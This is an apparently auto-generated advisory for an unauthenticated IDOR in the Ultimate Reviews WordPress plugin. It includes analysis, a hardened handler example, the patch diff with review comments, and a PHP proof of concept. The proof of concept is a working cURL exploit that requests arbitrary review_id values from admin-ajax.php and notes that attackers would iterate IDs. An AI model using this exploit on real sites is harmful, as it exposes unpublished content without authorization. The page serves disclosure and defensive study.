Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-24634: Ultimate Reviews <= 3.2.16 – Unauthenticated Insecure Direct Object Reference (ultimate-reviews)

Severity: Medium (CVSS 5.3)
CWE: 639
Vulnerable Version: 3.2.16
Patched Version: 3.2.17
Disclosed: January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24634:
This vulnerability is an unauthenticated Insecure Direct Object Reference (IDOR) in the Ultimate Reviews WordPress plugin. The flaw allows attackers to retrieve the full content of any review post, regardless of its publication status, by manipulating a user-controlled parameter. The CVSS score of 5.3 reflects a medium severity impact.

The root cause is missing validation on the `review_id` parameter in the `ewd_urp_ajax_read_more` function within `/ultimate-reviews/includes/Ajax.class.php`. The vulnerable code at line 173 accepts a POST parameter `review_id` and directly uses it in `get_post_field()` without verifying the post type matches `EWD_URP_REVIEW_POST_TYPE` or checking the post’s publication status. This lack of authorization allows object reference manipulation.

Exploitation occurs via the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. Attackers send a POST request with `action=ewd_urp_ajax_read_more` and a manipulated `review_id` parameter. The payload consists of any integer value corresponding to a WordPress post ID. The attack requires no authentication or nonce, making it accessible to completely unauthenticated users.

The patch adds a validation check before processing the `review_id`. The new code at lines 175-177 verifies two conditions: the post type must equal `EWD_URP_REVIEW_POST_TYPE` and the post status must be ‘publish’. If either condition fails, the function calls `ewdurpHelper::admin_nopriv_ajax()`, which terminates execution. This restricts access to only published review posts of the correct type.

Successful exploitation allows attackers to read the full content of any review post, including drafts, private posts, or posts from other post types that share the same ID space. This leads to unauthorized information disclosure. While the vulnerability does not enable modification or deletion, it violates confidentiality by exposing unpublished content that should remain inaccessible to unauthenticated users.
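The handler below is an added example, not the plugin's code and not part of the Atomic Edge analysis. It applies the same authorization rule the patch introduces (the referenced post must be of type `EWD_URP_REVIEW_POST_TYPE` and have status `publish`) but, going one step beyond the patch, it also rejects nonexistent ids and password-protected published reviews, answers every rejection with one uniform error response, and terminates explicitly on each path rather than relying on a helper to do so. Names prefixed `example_` are hypothetical; `EWD_URP_REVIEW_POST_TYPE` is the plugin constant shown in the diff, and the remaining functions are standard WordPress APIs.

```php
<?php
// Added example (not the plugin's code): a hardened read-more AJAX handler.
// "example_" names are hypothetical; EWD_URP_REVIEW_POST_TYPE comes from the
// plugin; absint, get_post, post_password_required, wp_send_json_error,
// wp_kses_post, apply_filters, wp_die and add_action are WordPress APIs.

/**
 * Resolve a user-supplied id to a review that the public endpoint may serve.
 * Returns the WP_Post on success or a WP_Error describing why it was refused.
 */
function example_get_readable_review( $raw_id ) {
    $review_id = absint( $raw_id ); // non-numeric or negative input becomes 0
    if ( 0 === $review_id ) {
        return new WP_Error( 'bad_id', 'Invalid review id.' );
    }

    $post = get_post( $review_id ); // null when no post has this id
    if ( ! $post ) {
        return new WP_Error( 'not_found', 'No such post.' );
    }

    // The id must reference a review, not a page, draft post, or any other type
    // that happens to share the same post ID space.
    if ( EWD_URP_REVIEW_POST_TYPE !== $post->post_type ) {
        return new WP_Error( 'wrong_type', 'Not a review.' );
    }

    // ... and that review must be publicly visible: published and not
    // password protected (a password does not change post_status).
    if ( 'publish' !== $post->post_status || post_password_required( $post ) ) {
        return new WP_Error( 'not_public', 'Review is not public.' );
    }

    return $post;
}

/**
 * AJAX callback. Every rejection path ends in wp_send_json_error(), which
 * calls wp_die(); the success path ends in an explicit wp_die() as well.
 */
function example_ajax_read_more() {
    $raw_id = isset( $_POST['review_id'] ) ? wp_unslash( $_POST['review_id'] ) : '';
    $post   = example_get_readable_review( $raw_id );

    if ( is_wp_error( $post ) ) {
        // One generic answer for every refusal, so the endpoint cannot be used
        // to learn whether an id exists, is a draft, or belongs to another type.
        wp_send_json_error( array( 'message' => 'Review not available.' ), 404 );
        return; // not reached; states the intent if wp_die() is ever filtered
    }

    echo "<span class='ewd-urp-ajax-read-more-content'>";
    echo wp_kses_post( apply_filters( 'the_content', $post->post_content ) );
    echo '</span>';
    wp_die();
}

// Register for both logged-in and anonymous visitors, as the original action is.
add_action( 'wp_ajax_example_read_more', 'example_ajax_read_more' );
add_action( 'wp_ajax_nopriv_example_read_more', 'example_ajax_read_more' );
```

Keeping the decision in a separate function that returns a `WP_Error` makes the rule unit-testable without an HTTP request, and the uniform 404 response means an id sweep against the endpoint yields no signal about unpublished content.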

Differential between vulnerable and patched code

Code Diff
--- a/ultimate-reviews/includes/Ajax.class.php
+++ b/ultimate-reviews/includes/Ajax.class.php
@@ -173,6 +173,10 @@

 			$review_id = intval( $_POST['review_id'] );

+			if ( get_post_type( $review_id ) != EWD_URP_REVIEW_POST_TYPE or get_post_status( $review_id ) != 'publish' ) {
+				ewdurpHelper::admin_nopriv_ajax();
+			}
+
 			echo "<span class='ewd-urp-ajax-read-more-content'>";
 			echo wp_kses_post( apply_filters( 'the_content', get_post_field( 'post_content', $review_id ) ) );
 			echo "<span class='ewd-urp-ajax-read-less' data-thumbnailchars='" . esc_attr( $ewd_urp_controller->settings->get_setting( 'thumbnail-characters' ) ) . "'>" . __( 'Read Less', 'ultimate-reviews' ) . "</span>";
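Review bot: the new guard relies entirely on `ewdurpHelper::admin_nopriv_ajax()` never returning; nothing in the visible lines stops execution if it does, so the `echo wp_kses_post( apply_filters( 'the_content', get_post_field( 'post_content', $review_id ) ) );` below would still emit the rejected post's content. Add an explicit `return;` or `wp_die();` after the helper call so the handler is safe regardless of how the helper is implemented. Minor: prefer `||` and `!==` over `or` and `!=`; `get_post_type()` returns `false` for a nonexistent id, which the loose comparison happens to reject, but strict operators make that intent visible.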
--- a/ultimate-reviews/ultimate-reviews.php
+++ b/ultimate-reviews/ultimate-reviews.php
@@ -7,9 +7,9 @@
 Author URI: https://www.etoilewebdesign.com/
 Terms and Conditions: https://www.etoilewebdesign.com/plugin-terms-and-conditions/
 Text Domain: ultimate-reviews
-Version: 3.2.16
+Version: 3.2.17
 WC requires at least: 7.1
-WC tested up to: 10.3
+WC tested up to: 10.4
 */

 if ( ! defined( 'ABSPATH' ) )
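Review bot: the `WC tested up to` change from 10.3 to 10.4 is a WooCommerce compatibility declaration with no bearing on the IDOR fix; bundling it into the security release makes the patch harder to audit and backport, so it belongs in its own commit. The `Version: 3.2.17` bump in this hunk must stay in step with the `EWD_URP_VERSION` constant, which the following hunk also moves to `3.2.17`.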
@@ -56,7 +56,7 @@
 		define( 'EWD_URP_PLUGIN_URL', untrailingslashit( plugin_dir_url( __FILE__ ) ) );
 		define( 'EWD_URP_PLUGIN_FNAME', plugin_basename( __FILE__ ) );
 		define( 'EWD_URP_TEMPLATE_DIR', 'ewd-urp-templates' );
-		define( 'EWD_URP_VERSION', '3.2.16' );
+		define( 'EWD_URP_VERSION', '3.2.17' );

 		define( 'EWD_URP_REVIEW_POST_TYPE', 'urp_review' );
 		define( 'EWD_URP_REVIEW_CATEGORY_TAXONOMY', 'urp-review-category' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24634 - Ultimate Reviews <= 3.2.16 - Unauthenticated Insecure Direct Object Reference

$target_url = 'http://example.com/wp-admin/admin-ajax.php';

// The review_id to attempt to read. Attackers would iterate through IDs.
$review_id = 123;

// Prepare the POST data for the vulnerable AJAX action
$post_data = array(
    'action' => 'ewd_urp_ajax_read_more',
    'review_id' => $review_id
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check for successful exploitation
if ($http_code == 200 && !empty($response)) {
    echo "[+] Successfully retrieved content for review ID: $review_id\n";
    echo "[+] Response:\n$response\n";
} else {
    echo "[-] Failed to retrieve content for review ID: $review_id\n";
    echo "[-] HTTP Code: $http_code\n";
}

?>
